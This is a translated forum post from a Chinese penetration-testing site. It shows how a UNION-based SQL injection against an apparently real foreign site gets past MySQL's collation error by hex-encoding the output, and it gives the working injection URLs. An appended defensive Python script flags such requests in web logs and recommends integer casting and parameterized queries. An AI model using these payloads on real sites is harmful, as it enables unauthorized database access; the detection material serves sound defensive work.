中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: Getting past Error No. 1267 during MySQL injection

Author: admin    Time: 2012-9-15 14:04
Original author: SuperHei
Article type: Original
Published: 2005-10-18
While testing a foreign site:
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
The error returned:
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
MySQL Error No. 1267
This appears to happen because the character sets (http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html) on the two sides of the UNION query differ.
The solution: convert the value to another encoding, such as hex.
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
This successfully returned the value of hex(version()):
342E312E332D62657461
Querying it back in MySQL gives:
mysql> select 0x342E312E332D62657461;
+------------------------+
| 0x342E312E332D62657461 |
+------------------------+
| 4.1.3-beta             |
+------------------------+
1 row in set (0.00 sec)
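
From the defender's side, both requests above show up in web server logs: c_id carries something other than an integer, and the hex() wrapper does not hide the UNION SELECT. The check below is an added example, not part of the original post; the path /list.php, the sample request lines and the assumption that c_id is an integer id are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: the application expects an integer id in these parameters.
NUMERIC_PARAMS = {"c_id"}

UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b")
# hex() wrapped around another function call, as in hex(version())
HEX_WRAP_RE = re.compile(r"\bhex\s*\(\s*\w+\s*\(")

# Constructed request lines (path and values are illustrative, not from a real log).
SAMPLE_REQUESTS = [
    "GET /list.php?c_id=2 HTTP/1.1",
    "GET /list.php?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/* HTTP/1.1",
    "GET /list.php?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/* HTTP/1.1",
    "GET /list.php?c_id=7&title=Student%20Union%20select%20committee HTTP/1.1",
]


def inspect_request(line):
    """Return {param: [tags]} for numeric parameters whose value is not an integer."""
    _method, target, _proto = line.split(" ", 2)
    findings = {}
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl has already percent-decoded the value.
        if name not in NUMERIC_PARAMS or re.fullmatch(r"-?\d+", value):
            continue
        # Drop SQL comments (including an unterminated trailing /*) and collapse
        # whitespace so keyword matching is not affected by comments or spacing.
        norm = re.sub(r"/\*.*?(?:\*/|$)", " ", value.lower(), flags=re.S)
        norm = re.sub(r"\s+", " ", norm)
        tags = ["non_integer"]
        if UNION_RE.search(norm):
            tags.append("union_select")
        if HEX_WRAP_RE.search(norm):
            tags.append("hex_wrapped")
        findings[name] = tags
    return findings


if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(inspect_request(request) or "clean", "<-", request)
```

The non_integer tag alone is the reliable signal: rejecting such values in the application (integer cast plus a parameterized query) removes the injection point regardless of how the output is encoded.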